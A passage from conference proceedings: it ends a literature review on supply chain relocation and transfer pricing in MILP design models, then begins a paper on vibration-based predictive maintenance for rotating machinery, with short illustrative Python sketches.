2). We discuss below the motivations most frequently analyzed or disputed in the scholarly literature. The most frequent relocation motivation concerns the cost and productivity of labor in the host country [30,41]. Another frequent motivation is the availability of skilled labor [49]. Some authors [2,54] emphasize quality improvement as a reason for relocating to geographical areas where advanced technologies and/or highly skilled labor are available. [59] specify that this improvement originates from the combined effect of factors available in the host country (e.g., the availability of skilled labor, local knowledge, the made-in effect). [47] argue that new product development is a particularly cogent offshoring motivation when knowledge of local needs and habits is a prerequisite for selling abroad. Other authors [22,40] highlight that companies sometimes offshore their manufacturing activities at the demand of key customers to produce in their proximity, especially in business-to-business (B2B) relations, or because of counter-trade requirements [24]. Finally, we found only one motivation regarding cost efficiency in the internal environment, cited by a paper focused on small and medium enterprises, namely economies of scale [47]. This suggests a possibly lower relevance of this category of motivations for relocation decisions.

5 Literature Review: Dimensions of the Relocation Decision Model and Its Different Variables

5.1 Mapping Review of Supply Chains Relocation

In this article, we do not aim to present a full state of the art of research on supply chain relocation, but rather to conduct a mapping review in order to show how the strategic dimension of this topic is spreading in scientific journals. Looking at the large number and the increasing quality of articles published in this field, it is undeniable that research on supply chain relocation (SCR) is becoming more and more important and is impacting the development of many fields. It is interesting to find out which domains this research has reached, how much work has been done over the last twenty years, and by whom. To answer these questions, we analyze articles published between 2001 and 2020.

Fig. 2. Different motivations, drawn from the literature, for relocating supply chains.

5.2 Mapping Strategy

It is important to identify and search all possible sources of information that address the research question directly. For that, we scoured the following terms: supply chain relocation, supply chain delocalization, logistics network relocation, supply chain design, production relocation, capacities relocation, capacities allocation, nearshore, supply chain reconfiguration/re-conception, back-shoring, and so on. Furthermore, the Boolean operators 'OR', 'AND', and 'NOT' were used to join synonymous terms and exclude non-related terms so as to retrieve relevant records. Example searches included ('supply chain' AND 'relocation' NOT 'offshoring'), ('supply chain' AND 'relocation' NOT 'FDI'), ('supply chain' AND 'relocation' NOT 'externalization'), and ('supply chain' AND 'relocation' NOT 'Management'). The titles and abstracts containing these terms among peer-reviewed, scholarly journals indexed in the SCOPUS database were searched, which resulted in the identification of 252 titles. These titles were analyzed and sorted to keep only those relevant to our topic. We present below the resulting mapping of our research.

5.3 Yearly Contribution Trend and Main Authors

We first project the selected articles over time to show the contribution by year, and then by author.

Fig. 3. Yearly contribution in terms of scientific articles related to SCR.

Figure 3 shows the trends in the publication of these articles over the 20 years from 2001 to 2020, i.e., the distribution of the articles over time. The largest number of works on the topic of SCR appeared in 2019, with 26 articles (10.3%), and decreased slightly to 23 articles in 2020 due to the COVID-19 pandemic. Even with the major disruptions caused by the pandemic, SCR is an ever-growing field, and more attention may be given in the future to risk management and back-shoring options. Figure 4 shows the most highly indexed articles by main author. The most prolific authors on our topic of research (SCR) are, in order: Van Der Vorst, J.C.A.J., followed by Hammami, R.; Min, H.; Zhang, A.; Karimi, I.A.; then Huang, G.Q.; Fandel, G.; Melo, M.T.; Vila, D.; and Georgiadis, M.C. In the next section, the articles related to these authors were reviewed and filtered according to the previously described characteristics.


Fig. 4. Highest indexed contribution in SCR by main authors.

5.4 Subject Area and Fields of Research

The articles’ content was examined to determine their disciplinary position and fields of study.

Fig. 5. Subject area and fields of research of SCR.

It is reasonable that supply chain relocation studies are mostly conducted in the field of Business, Management, and Accounting (48.1%), because this subject area aims to push the boundaries of supply chain research and practice to gain more efficiency, performance, and integration. In second place we found the Engineering field (36.6%), followed by the Decision Sciences field (23.9%) (see Fig. 5).

5.5 Geographical Position and Contributing Affiliations

We are interested in the distribution of research by country, affiliation, and laboratory.

Fig. 6. Geographical position of contributing countries in SCR topic.

According to Fig. 6, our selected studies on supply chain relocation were mainly carried out in 10 countries. Most studies took place in the USA (64 articles, 25%), while only 10 articles (3.9%) came from Canada. Other works were published in either Europe (42%) or Asia (12.3%). The remaining 16% of articles belong to 30 other countries around the world.

Fig. 7. Main contributing affiliations regarding the SCR topic.


The most active contributing affiliations regarding the SCR topic are 'Wageningen University and Research Center' in the Netherlands, followed by 'The University of Hong Kong' (Fig. 7). The third and fourth affiliations are from Singapore. The other top-10 affiliations belong either to Europe or to the USA. This mapping review is a powerful tool because it can help researchers working on supply chain relocation find the most interesting works in their field, identify possible ways of collaboration, and drive further new research.

6 Financial Factors in SCRM

As confirmed by many studies, supply chain design depends on fiscal factors. Indeed, Oliveira [67] emphasized the influence of transfer pricing and tax rates on the investment decision. Shunko et al. [57] also used transfer pricing in their model as a decisive element for shifting incomes to countries with low tax rates in order to maximize the overall profit after taxation. Furthermore, through confirmed case studies [12,13], the authors demonstrated that the relocation decision is very sensitive to changes in transfer pricing policies. In the example below (Fig. 8), we can see how multinational firms can manipulate transfer prices to determine the geographic location of their profit. In fact, the global after-tax profit (ATP) can be increased by shifting incomes to low-tax jurisdictions.

Fig. 8. An illustrative example of the relation between the Transfer Price manipulation and geographic profit shifting.
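The mechanism illustrated in Fig. 8 can be expressed in a few lines of code. The sketch below is a minimal illustration with hypothetical unit costs, selling price, and tax rates (not the figures used in Fig. 8): site A, located in the low-tax country, sells an intermediate product to site B at a transfer price, and raising that price moves taxable income from B to A, which increases the group's global after-tax profit per unit.

# Minimal Python sketch of transfer-price-driven profit shifting (hypothetical figures).
def global_atp_per_unit(tp, cost_a=10.0, cost_b=5.0, final_price=40.0,
                        tax_a=0.10, tax_b=0.30):
    """Global after-tax profit per unit for a two-site chain.

    Site A (low-tax) makes the intermediate product and sells it to
    site B (high-tax) at the transfer price tp; B sells the final product.
    """
    atp_a = (tp - cost_a) * (1 - tax_a)                # site A, taxed at 10%
    atp_b = (final_price - tp - cost_b) * (1 - tax_b)  # site B, taxed at 30%
    return atp_a + atp_b

for tp in (15.0, 20.0, 25.0):
    print(f"transfer price {tp:5.1f} $/unit -> global ATP {global_atp_per_unit(tp):5.2f} $/unit")

Because site A's tax rate is lower here, every extra dollar of transfer price adds (tax_b - tax_a) dollars of after-tax profit per unit, which is exactly the lever discussed in the text.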

So, by relocating more production capacities to the low-tax jurisdiction (site A) and increasing the transfer price of the purchased intermediate products, incomes are shifted from site B to site A, and the global profit of the two companies increases to 7.8 $ per unit. The first step is to recognize the different characteristics and constraints impacting the supply chain relocation model. These characteristics were summarized by Hammami et al. [33] and classified under four axes, as shown in Fig. 9.

Fig. 9. Classification of the 25 characteristics of the existing supply chain design models.

Building on a previous study [14], we present in Table 3 an updated status, including research up to 2021, regarding the completeness of the profit structure. In this study we compare the integration of the following criteria in the literature:

– Taxes (T): income tax in the host country.
– Exchange rate (ER): the exchange-rate factor for converting costs and prices from the local currency to the standard currency.
– Transfer pricing (TP): we assess the consideration of TP in the existing models in the literature.
– Financing and taxation incentives (FI): incentives offered by host governments to attract facility investments in their regions.
– Relocation context (Relocation): we assess the existing models' compatibility with the relocation context.

By filtering our selected literature on transfer pricing (TP) as a decision variable or parameter of the model, we find only seven works: [20,23,25,31,32,39,63]. Details are shown in Table 3.


Table 3. Chronological classification of existing supply chain design models in the literature according to the selected financial factors. For each model, the table marks which of the criteria T, ER, FI, TP and Relocation are covered, together with its year of publication (from 1989 to 2020). The models classified are those of Cohen [20], Cohen and Lee [19], Arntzen [4], Huchzermeier [35], Min and Melachrinoudis [46], Canel [16], Vidal [63], Jayaraman [37], Canel et al. [17], Verter [62], Goetschalckx [26], Yan [66], Fandel [23], Melo [45], Avittathur [9], Chakravarty [18], Wilhelm [65], Vila [64], Goh et al. [27], Shunko [58], Beckman [11], Karimi et al. [50], Hammami [32], Perron [53], Georgiadis [25], Zambujal [67], Zhang [68], Hammami and Frein [31], Liu [43], Shunko [57], M.K. Boujelben [39], Van der Vorst [61], Huang [34], Asefi et al. [6], and Sundarakani [60].


The first pioneering paper to introduce local content in the decision model was published in 1989 by Cohen et al. [20]; its MILP (mixed-integer linear programming) model covers 40% of the 25 characteristics described in Fig. 9. However, this model has some limits to its application in the current industrial context, because it is built according to a product-based approach, whereas a process approach offers more flexibility in defining activities and is more pertinent for supply chain design. It was followed by the work of Vidal and Goetschalckx in 2001 [63], in which the authors solve a deterministic model using MILP; the objective function is the maximization of global profit after tax deduction. However, it is far from being a global model, since it considers only four decision variables: facility location, intermediate products, TP, and transport cost allocation. The third work is by Fandel and Stammen, 2004 [23]; the authors ignored the transfer of capacities and introduced TP as a parameter of their deterministic MILP model, not as a decision variable. According to Table 3, none of these works covers the majority of the financial characteristics. It was only in 2009 that Hammami et al. [32] established a more global model for supply chain design in which the objective function is profit maximization; in this model, TP is a decision variable. Covering 60% of the characteristics, the model of Georgiadis et al. [25] aims to optimize the supply chain during general strategic operations without considering the particular aspects and objectives of supply chain relocation. Hammami and Frein, 2014 [31], used the same model under two different transfer pricing methodologies; their objective was to measure the impact of the adopted TP methodology on the relocation decision. This work is very interesting insofar as it highlights the interaction between the geographical allocation of subsidiaries and transfer pricing, yet the TP methodologies are subject to many factors that the BEPS project introduced in 2015 [15,56]. This justifies our review, which emphasizes the necessity of adding new constraints and revising the global model by integrating other elements related to the transfer price. The last work is by M. Boujelben in 2018 [39]: an MILP for modeling distribution center locations that takes international financial parameters such as TP, ER, and taxes into consideration. However, it is not a general model, since it covers only 40% of the characteristics described in Fig. 9. All seven selected models are deterministic and based on MILP. Except for the work of Hammami [31], the other models do not formulate the transfer price as a constraint while optimizing their objective function.
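To make the shared structure of these seven models concrete, the following toy sketch (not taken from any of the cited papers) shows, in Python with the PuLP library, a deterministic MILP in which the transfer price is a decision variable and the objective is the group's global after-tax profit. All costs, prices, tax rates and candidate TP levels are hypothetical, and the transfer price is discretised into a few levels so that the model stays linear.

from pulp import LpProblem, LpMaximize, LpVariable, lpSum, LpBinary, value

tp_levels = [15.0, 20.0, 25.0]              # candidate transfer prices (assumed)
demand, cost_a, cost_b = 100, 10.0, 5.0     # demand and unit production costs (assumed)
price, tax_a, tax_b = 40.0, 0.10, 0.30      # final price and income-tax rates (assumed)

m = LpProblem("toy_supply_chain_design", LpMaximize)
y = {t: LpVariable(f"pick_tp_{t:.0f}", cat=LpBinary) for t in tp_levels}   # one binary per TP level
q = {t: LpVariable(f"flow_at_tp_{t:.0f}", lowBound=0) for t in tp_levels}  # units shipped at that level

m += lpSum(y.values()) == 1                 # exactly one transfer price is adopted
for t in tp_levels:
    m += q[t] <= demand * y[t]              # units can only flow at the chosen TP level
m += lpSum(q.values()) == demand            # all demand is served (assumption)

# Objective: global after-tax profit (site A sells to site B at the transfer price t).
m += lpSum((t - cost_a) * (1 - tax_a) * q[t]
           + (price - t - cost_b) * (1 - tax_b) * q[t] for t in tp_levels)

m.solve()
chosen = [t for t in tp_levels if value(y[t]) > 0.5]
print("chosen transfer price:", chosen, "global after-tax profit:", value(m.objective))

With these assumed figures the solver picks the highest admissible transfer price, since every unit of price moved from the high-tax to the low-tax site increases the after-tax profit; the models discussed above layer facility-location, capacity and tax-related constraints on top of this kind of skeleton.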

7 Conclusion

We have conducted an innovative overview of the literature based on a sound understanding of the different concepts related to supply chain relocation. We have been able to identify fruitful research and analyze the various dimensions and parameters of SCR models. Among these dimensions, we have shown the importance of transfer pricing as a decision variable in selecting potential affiliates and in the geographical relocation of profit. It will be helpful to drive research toward establishing an optimization model that takes into account all operational and financial characteristics, as well as the new constraints added by the BEPS project, in order to analyze the sensitivity of the relocation decision to changes in the transfer pricing strategy. Finally, further conclusions useful for governments and multinational firms can be drawn. The presented mapping review approach can be generalized and can help researchers find fruitful works related to their fields. Furthermore, by comparing these works according to some metrics, one can find the gaps in the previous literature and may be able to conceive new problems for study.

References 1. Ancarani, A., Di Mauro, C.: Reshoring and industry 4.0: how often do they go together? IEEE Eng. Manage. Rev. 46(2), 87–96 (2018) 2. Arlbjørn, J.S., L¨ uthje, T.: Global operations and their interaction with supply chain performance. Ind. Manage. Data Syst. 112, 1044–1064 (2012) 3. Arlbjørn, J.S., Mikkelsen, O.S.: Backshoring manufacturing: notes on an important but under-researched theme. J. Purchasing Supply Manage. 20(1), 60–62 (2014) 4. Arntzen, B.C., Brown, G.G., Harrison, T.P., Trafton, L.L.: Global supply chain management at digital equipment corporation. Interfaces 25(1), 69–93 (1995) 5. Arthuis, J.: La globalisation de l’´economie et les d´elocalisations d’activit´e et d’emplois. Rapport au S´enat (145) (2005) 6. Asefi, H., Lim, S., Maghrebi, M., Shahparvari, S.: Mathematical modelling and heuristic approaches to the location-routing problem of a cost-effective integrated solid waste management. Ann. Oper. Res. 273(1), 75–110 (2019) 7. Assabane, I., et al.: Study on the impact of smart and innovative delocalization practices on international trade. Turk. J. Comput. Math. Educ. (TURCOMAT) 12(5), 958–963 (2021) 8. Aubert, P., Sillard, P.: D´elocalisations et r´eductions d’effectifs dans l’industrie fran¸caise (2005) 9. Avittathur, B., Shah, J., Gupta, O.K.: Distribution centre location modelling for differential sales tax structure. Eur. J. Oper. Res. 162(1), 191–205 (2005) 10. Bals, L., Jensen, P.D.Ø., Larsen, M.M., Pedersen, T.: Exploring layers of complexity in offshoring research and practice. In: The offshoring challenge, pp. 1–18. Springer (2013). https://doi.org/10.1007/978-1-4471-4908-8 1 11. Beckman, S.L., Rosenfield, D.B.: Operations Strategy: Competing in the 21st Century. McGraw-Hill, New York (2008) 12. Benfssahi, M., El Felsoufi, Z., Haddach, A.: Modeling financial criteria for decisions of delocalization: case study and managerial insights. In: Proceedings of the International Conference on Industrial Engineering and Operations Management Paris, France, July, pp. 26–27 (2016) 13. Benfssahi, M., El Felsoufi, Z., Haddach, A., Elayachi, B.: Analytical study of transfer of manufacturing capacities basing on financial criteria. In: International Colloquium on Logistics and Supply Chain Management, pp. 38–43. IEEE (2018)


14. Benfssahi, M., Elfelsoufi, Z.: Modeling of supply chains delocalization problems taking into account the new financial policies: case of multinational firms established in OECD member countries. Int. J. Soc. Behav. Educ. Econ. Bus. Ind. Eng. 10(11), 3780–3786 (2016) 15. Bulletins d’Actualit´es Osler: Rapports finaux 2015 du Projet BEPS - R´eforme de la fiscalit´e internationale. Technical report, OSLER (2015). https://www.osler.com/ fr/ressources/reglements/2015/rapports-finaux-2015-du-projet-beps-reforme-de-l 16. Canel, C., Khumawala, B.M.: Multi-period international facilities location: an algorithm and application. Int. J. Prod. Res. 35, 1891–1910 (1997) 17. Canel, C., Khumawala, B.M.: International facilities location: a heuristic procedure for the dynamic uncapacitated problem. Int. J. Prod. Res. 39(17), 3975–4000 (2001) 18. Chakravarty, A.K.: Global plant capacity and product allocation with pricing decisions. Eur. J. Oper. Res. 165(1), 157–181 (2005) 19. Cohen, M.A., Lee, H.L.: Resource deployment analysis of global manufacturing and distribution networks. J. Manuf. Oper. Manage. 2(2), 81–104 (1989) 20. Cohen, M.A., Fisher, M., Jaikumar, R.: International manufacturing and distribution networks: a normative model framework. Managing Int. Manuf. 13, 67–93 (1989) 21. Contractor, F.J., Kumar, V., Kundu, S.K., Pedersen, T.: Reconceptualizing the firm in a world of outsourcing and offshoring: the organizational and geographical relocation of high-value company functions. J. Manage. Stud. 47(8), 1417–1433 (2010). https://doi.org/10.1111/j.1467-6486.2010.00945.x, https://onlinelibrary. wiley.com/doi/10.1111/j.1467-6486.2010.00945.x 22. Ellram, L.M.: Offshoring, reshoring and the manufacturing location decision. J. Supply Chain Manage. 49(2), 3 (2013) 23. Fandel, G., Stammen, M.: A general model for extended strategic supply chain management with emphasis on product life cycles including development and recycling. Int. J. Prod. Econ. 89, 293–308 (2004) 24. Fratocchi, L., Di Mauro, C., Barbieri, P., Nassimbeni, G., Zanoni, A.: When manufacturing moves back: concepts and questions. J. Purchasing Supply Manage. 20(1), 54–59 (2014) 25. Georgiadis, M.C., Tsiakis, P., Longinidis, P., Sofioglou, M.K.: Optimal design of supply chain networks under uncertain transient demand variations. Omega 39(3), 254–272 (2011) 26. Goetschalckx, M., Vidal, C.J., Dogan, K.: Modeling and design of global logistics systems: a review of integrated strategic and tactical models and design algorithms. Eur. J. Oper. Res. 143(1), 1–18 (2002) 27. Goh, M., Lim, J.Y., Meng, F.: A stochastic model for risk management in global supply chain networks. Eur. J. Oper. Res. 182(1), 164–173 (2007) 28. Grignon, F.: Rapport d’information sur la d´elocalisation des industries de maind’œuvre. Commission des affaires ´economiques et du Plan 374 (2004) 29. Guzik, R., Micek, G.: The impact of delocalization on the European software industry. In: The Moving Frontier, pp. 229–253. Routledge (2019) 30. Gylling, M., Heikkil¨ a, J., Jussila, K., Saarinen, M.: Making decisions on offshore outsourcing and backshoring: a case study in the bicycle industry. Int. J. Prod. Econ. 162, 92–100 (2015) 31. Hammami, R., Frein, Y.: Redesign of global supply chains with integration of transfer pricing: mathematical modeling and managerial insights. Int. J. Prod. Econ. 158, 267–277 (2014). https://doi.org/10.1016/j.ijpe.2014.08.005


32. Hammami, R., Frein, Y., Hadj-Alouane, A.B.: A strategic-tactical model for the supply chain design in the delocalization context: mathematical formulation and a case study. Int. J. Prod. Econ. 122(1), 351–365 (2009). https://doi.org/10.1016/j. ijpe.2009.06.030, www.sciencedirect.com/science/article/pii/S0925527309001996 33. Hammami, R., Frein, Y., Hadj-Alouane, A.B.: Supply chain design in the delocalization context: relevant features and new modeling tendencies. Int. J. Prod. Econ. 113(2), 641–656 (2008) 34. Huang, Y., Huang, G.Q., Newman, S.T.: Coordinating pricing and inventory decisions in a multi-level supply chain: a game-theoretic approach. Transp. Res. Part E Logistics Transp. Rev. 47(2), 115–129 (2011) 35. Huchzermeier, A., Cohen, M.A.: Valuing operational flexibility under exchange rate risk. Oper. Res. 44(1), 100–113 (1996) 36. Jahns, C., Hartmann, E., Bals, L.: Offshoring: dimensions and diffusion of a new business concept. J. Purchasing Supply Manage. 12(4), 218–231 (2006) 37. Jayaraman, V., Pirkul, H.: Planning and coordination of production and distribution facilities for multiple commodities. Eur. J. Oper. Res. 133(2), 394–408 (2001) 38. Johansson, M., Olhager, J.: Comparing offshoring and backshoring: the role of manufacturing site location factors and their impact on post-relocation performance. Int. J. Prod. Econ. 205, 37–46 (2018) 39. Kchaou Boujelben, M., Boulaksil, Y.: Modeling international facility location under uncertainty: a review, analysis, and insights. IISE Trans. 50(6), 535–551 (2018) 40. Kinkel, S.: Trends in production relocation and backshoring activities: changing patterns in the course of the global economic crisis. Int. J. Oper. Prod. Manage. (2012) 41. Kinkel, S., Maloca, S.: Drivers and antecedents of manufacturing offshoring and backshoring-a German perspective. J. Purchasing Supply Manage. 15(3), 154–165 (2009) 42. Lewin, A.Y., Volberda, H.W.: Co-evolution of global sourcing: the need to understand the underlying mechanisms of firm-decisions to offshore. Int. Bus. Rev. 20(3), 241–251 (2011). https://doi.org/10.1016/j.ibusrev.2011.02. 008, https://www.sciencedirect.com/science/article/pii/S0969593111000321. Coevolutionary Research on Global Sourcing: Implications for Globalization, International Strategies, and Organizational Designs 43. Liu, S., Papageorgiou, L.G.: Fair profit distribution in multi-echelon supply chains via transfer prices. Omega 80, 77–94 (2018) 44. Melo, M.T., Nickel, S., Saldanha-da Gama, F.: Facility location and supply chain management - a review. Eur. J. Oper. Res. 196(2), 401–412 (2009). https://doi. org/10.1016/j.ejor.2008.05.007 45. Melo, M.T., Nickel, S., Da Gama, F.S.: Dynamic multi-commodity capacitated facility location: a mathematical modeling framework for strategic supply chain planning. Comput. Oper. Res. 33(1), 181–208 (2006) 46. Min, H., Melachrinoudis, E.: Dynamic location and entry mode selection of multinational manufacturing facilities under uncertainty: a chance-constrained goal programming approach. Int. Trans. Oper. Res. 3(1), 65–76 (1996) 47. Mohiuddin, M., Su, Z.: Manufacturing small and medium size enterprises offshore outsourcing and competitive advantage: an exploratory study on Canadian offshoring manufacturing SMEs. J. Appl. Bus. Res. (JABR) 29(4), 1111–1130 (2013) 48. Mouhoud, E.M.: Th´eories et r´ealit´es des d´elocalisations dans l’industrie et les services. Post-print, HAL (2013). https://EconPapers.repec.org/RePEc:hal:journl: hal-01489230


´ Waehrens, B.V., Slepniov, D.: Accessing offshoring 49. Mykhaylenko, A., Motika, A., advantages: what and how to offshore. Strateg. Outsourcing Int. J. (2015) 50. Naraharisetti, P.K., Karimi, I., Srinivasan, R.: Supply chain redesign through optimal asset management and capital budgeting. Comput. Chem. Eng. 32(12), 3153– 3169 (2008) 51. OCDE: Perspectives des technologies de l’information de l’OCDE. Technical report, US (2004) 52. OECD: OECD guidelines on corporate governance of state-owned enterprises. Corporate Governance, p. 55 (2005). https://doi.org/10.1787/9789264116078-en 53. Perron, S., Hansen, P., Le Digabel, S., Mladenovi´c, N.: Exact and heuristic solutions of the global supply chain problem with transfer pricing. Eur. J. Oper. Res. 202(3), 864–879 (2010) 54. Persaud, A., Floyd, J.: Offshoring and outsourcing of R and D and business activities in Canadian technology firms. J. Technol. Manage. Innov. 8(3), 1–12 (2013) 55. Pickles, J., Smith, A.: Delocalization and persistence in the European clothing industry: the reconfiguration of trade and production networks. Reg. Stud. 45(2), 167–185 (2011) 56. PricewaterhouseCoopersLLP: International transfer pricing 2015/16, p. 1200 (2016). https://doi.org/10.1561/1400000037, www.pwc.com/internationaltp 57. Shunko, M., Debo, L., Gavirneni, S.: Transfer pricing and sourcing strategies for multinational firms. Prod. Oper. Manage. 23(12), 2043–2057 (2014). https://doi. org/10.1111/poms.12175 58. Shunko, M., Gavirneni, S.: Role of transfer prices in global supply chains with random demands. J. Indus. Manage. Optim. 3(1), 99 (2007) 59. Slepniov, D., Brazinskas, S., Wæhrens, B.V.: Nearshoring practices: an exploratory study of Scandinavian manufacturers and Lithuanian vendor firms. Baltic J. Manage. (2013) 60. Sundarakani, B., Pereira, V., Ishizaka, A.: Robust facility location decisions for resilient sustainable supply chain performance in the face of disruptions. Int. J. Logistics Manage. (2020) 61. van der Vorst, J.G., Tromp, S.O., van der Zee, D.J.: Simulation modelling for food supply chain redesign; integrated decision making on product quality, sustainability and logistics. Int. J. Prod. Res. 47(23), 6611–6631 (2009) 62. Verter, V., Dasci, A.: The plant location and flexible technology acquisition problem. Eur. J. Oper. Res. 136(2), 366–382 (2002) 63. Vidal, C.J., Goetschalckx, M.: A global supply chain model with transfer pricing and transportation cost allocation (April 2016) (2001). https://doi.org/10.1016/ S0377-2217(99)00431-2 64. Vila, D., Martel, A., Beauregard, R.: Designing logistics networks in divergent process industries: a methodology and its application to the lumber industry. Int. J. Prod. Econ. 102, 358–378 (2006) 65. Wilhelm, W., Liang, D., Rao, B., Warrier, D., Zhu, X., Bulusu, S.: Design of international assembly systems and their supply chains under NAFTA. Transp. Res. Part E Logistics Transp. Rev. 41(6), 467–493 (2005) 66. Yan, H., Yu, Z., Cheng, T.C.: A strategic model for supply chain design with logical constraints: formulation and solution. Comput. Oper. Res. 30(14), 2135– 2155 (2003). https://doi.org/10.1016/S0305-0548(02)00127-2 67. Zambujal-Oliveira, J.: A real options analysis of foreign direct investment competition in a news uncertain environment. Int. J. Econ. Manage. Eng. 5(5), 480–485 (2011)


68. Zhang, A., Luo, H., Huang, G.Q.: A bi-objective model for supply chain design of dispersed manufacturing in China. Int. J. Prod. Econ. 146(1), 48–58 (2013) 69. Zhu, S., Pickles, J.: Bring in, go up, go west, go out: upgrading, regionalisation and delocalisation in China’s apparel production networks. J. Contemp. Asia 44(1), 36–63 (2014)

A Predictive Maintenance System Based on Vibration Analysis for Rotating Machinery Using Wireless Sensor Network (WSN) Imane El Boughardini(B) , Meriem Hayani Mechkouri, and Kamal Reklaoui Engineering, Innovation Management and Industrial Systems Research Laboratory, FSTT University Abdelmalek ESSAADI, Tangier, Morocco [email protected], {mhayanimechkouri, kreklaoui}@uae.ac.ma

Abstract. Over the years, more and more industries have focused on digitizing their manufacturing operations by using advanced technologies such as Machine Learning and Artificial Intelligence, based on different equipment and materials such as sensors, cameras, and lidar. All of them can be combined with wireless communication technology to create an IoT network. In this context, the objective is to present our contribution in the field of failure prediction for rotating machinery, based on a diagnosis and prognosis system for predictive maintenance. With the help of new intelligent diagnostic indicators, it is possible to target fault points in real time before taking actions using stream processing. Machine behavior analysis is a traditional approach used in the maintenance field to capture damage and failure; it is also a perfect tool for detecting and then diagnosing operating faults in rotating machines. The present work is about predicting such situations using a new wireless sensor network for rotating machinery, by capturing and processing all the collected data and testing them with machine learning algorithms. Keywords: Predictive Maintenance · Wireless Sensors Network · Rotating Machinery · Vibration analysis

1 Introduction

Since the beginning of the 19th century, the world has witnessed the emergence of one industrial revolution after another, each of them powered by revolutionary new technologies: steam-engine mechanics, assembly-line principles, and computing power. They are called industrial revolutions because the innovations that sparked them not only increased productivity and efficiency but also transformed the entire manufacturing sector. Today we are experiencing the fourth industrial revolution, which takes supply chain automation, monitoring, and analytics to a new level through smart technologies. At the heart of Industry 4.0 are the Industrial Internet of Things (IIoT), cyber-physical systems (CPS), information and communications technology (ICT), and intelligent autonomous systems that use computer algorithms to monitor and control physical things, including equipment, robots, and vehicles.


Cyber-Physical Systems (CPS) are defined as transformative technologies for managing interconnected systems between their physical assets and computational capabilities, which can interact with humans through many new modalities [1]. They are characterized by advanced connectivity that allows real-time data acquisition from physical objects and information feedback from the cyber space, and by intelligent data management, analytics, and computational capability that construct the cyber space [2]. All these functionalities are important to make the digital smart factory real, as Industry 4.0 is based on the massive use of data and greatly increased connectivity. Based on several works, there are nine main pillars of the Fourth Industrial Revolution; they outline the new technologies manufacturers are using to improve all areas of the production process. These technologies include the Industrial Internet of Things (IIoT), Big Data and analytics, horizontal and vertical system integration, simulation, cloud computing, and Augmented Reality (AR) [3]. This industrial revolution promises many potential benefits for companies: improved plant efficiency, reduced running costs, automation of the production process, etc. It has also given rise to a new proactive maintenance strategy based on prediction, by which greater maintenance efficiency is obtained through data analysis in predictive maintenance. The remainder of this paper is organized as follows. Section 2 summarizes predictive maintenance for rotating machinery and the need for our study. Section 3 presents detection, diagnosis, and prognosis for rotating machinery, Section 4 introduces wireless sensor networks, and Section 5 presents the proposed scheme followed by a discussion, ending with our conclusion and perspectives in the last section.

2 Predictive Maintenance for Rotating Machinery

Rotating machinery is one of the most common classes of machines [4], and rotating equipment is the reason for a large number of unplanned breakdowns. So far, these items are serviced after a certain period or not serviced at all; thus, maintenance is carried out too early or, in some cases, too late, leading to production stoppages. Continuous monitoring allows us to identify signs of faults and set the stage for predictive maintenance. In this way, the threat of failure can be anticipated, or maintenance can be carried out in a timely manner. In addition, information on the status of equipment components is available at all times.

2.1 Concept and Functioning of Predictive Maintenance (PdM)

Predictive maintenance (PdM) is gaining in importance in multidisciplinary research groups [5]. It is one of the most practical and advanced applications for managing maintenance in smart factories and is therefore part of Industry 4.0. A proactive maintenance strategy uses condition-monitoring tools to detect various signs of equipment degradation, anomalies, and performance issues. PdM aims to minimize maintenance costs, implement zero-waste production, and reduce the number of major breakdowns [6]. The main advantage of predictive maintenance is being able to schedule work based on the current condition of the asset. Predictive maintenance collects data so that it can be analyzed and used for the purpose for which it is intended: based on Internet of Things technology, condition-monitoring sensors collect and share data, connecting assets to a central system that stores incoming information to predict the remaining useful life of an asset.

2.2 Predictive Maintenance Technologies

To avoid production stoppages, it is necessary to constantly monitor this equipment and track down all the warning signs of defects right on time. There are several condition-monitoring techniques that can be used to effectively predict failures and provide advance warnings. Based on several works, there is a wide range of parameters that can be monitored for predictive maintenance, some of the most important being [7]: vibration analysis, acoustic analysis, lubrication oil analysis, particle analysis in the working environment, corrosion analysis, thermal analysis, and performance analysis.

Vibration Analysis. Moving parts of rotating machinery can produce disruptive vibrations that eventually cause breakdowns. There are various diagnostic techniques that use vibration measurements as indicators, through which it is possible to determine the root cause of the deterioration of the machine. Several studies have shown that the most reliable parameter reflecting the state of deterioration of a rotating machine is vibration [8]. Vibration analysis is used to monitor the health of rotating machinery in operation and aims to detect any malfunctions and to follow their evolution in order to plan a mechanical intervention [9].

2.3 Predictive Maintenance - Process (CBM-PHM)

Predictive maintenance takes into account the health of machine components to predict future breakdowns. Therefore, the development of an efficient predictive maintenance approach requires integrating detection, diagnosis, and prognosis into the process, allowing intelligent diagnosis of the health of rotating machines based on vibration analysis in order to detect and monitor degradation. The remaining operating time can then be predicted and unplanned downtime avoided (Fig. 1).

Fig. 1. Predictive Maintenance process [10, 11].


Condition-Based Maintenance (CBM). CBM is a maintenance program that recommends maintenance actions based on the information collected through condition monitoring [12]. It includes data acquisition, data processing, fault detection, and diagnostics.

Prognostic Health Management (PHM). PHM is a health management approach using measurements, models, and software to accomplish early fault detection, condition assessment, and failure progression prediction [13]. It includes prognosis, estimation of the remaining useful life (RUL), and the decision-making process for the implementation of predictive maintenance and the associated logistics.

3 Detection, Diagnosis, and Prognosis for Rotating Machinery

3.1 Detecting Faults of Rotating Machines

There are several methods for detecting faults in rotating machines (the envelope method, the wavelet transform, the singular value decomposition).

The Envelope Method (example of a bearing fault detection case). The envelope method is a technique that exploits the high-frequency resonance of the bearing (or of the sensor). It uses the resonance frequency of the bearing to extract the information needed to determine the presence of the defect, and it brings this information back into the frequency range normally observed in vibration analysis (0–1500 Hz). More precisely, the envelope method uses the amplitude modulation of the resonant frequency of the bearing by the defect frequency. In practice, the envelope method requires a series of processing steps on the raw time signal before the result is obtained (Fig. 2).
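As an illustration of these processing steps, the following Python sketch (with an entirely synthetic signal and assumed sampling rate, resonance band, and defect frequency) band-passes the raw signal around the bearing resonance, takes the Hilbert-transform envelope, and inspects the envelope spectrum in the usual 0–1500 Hz range. It is a minimal sketch of the principle, not the processing chain of Fig. 2.

import numpy as np
from scipy.signal import butter, filtfilt, hilbert

fs = 20000                                    # sampling rate in Hz (assumption)
t = np.arange(0, 1.0, 1 / fs)
f_defect, f_res = 87.0, 4000.0                # hypothetical defect and resonance frequencies
# Synthetic signal: resonance carrier amplitude-modulated at the defect frequency, plus noise.
x = (1 + np.sin(2 * np.pi * f_defect * t)) * np.sin(2 * np.pi * f_res * t)
x += 0.5 * np.random.randn(len(t))

b, a = butter(4, [3000, 5000], btype="bandpass", fs=fs)   # isolate the resonance band
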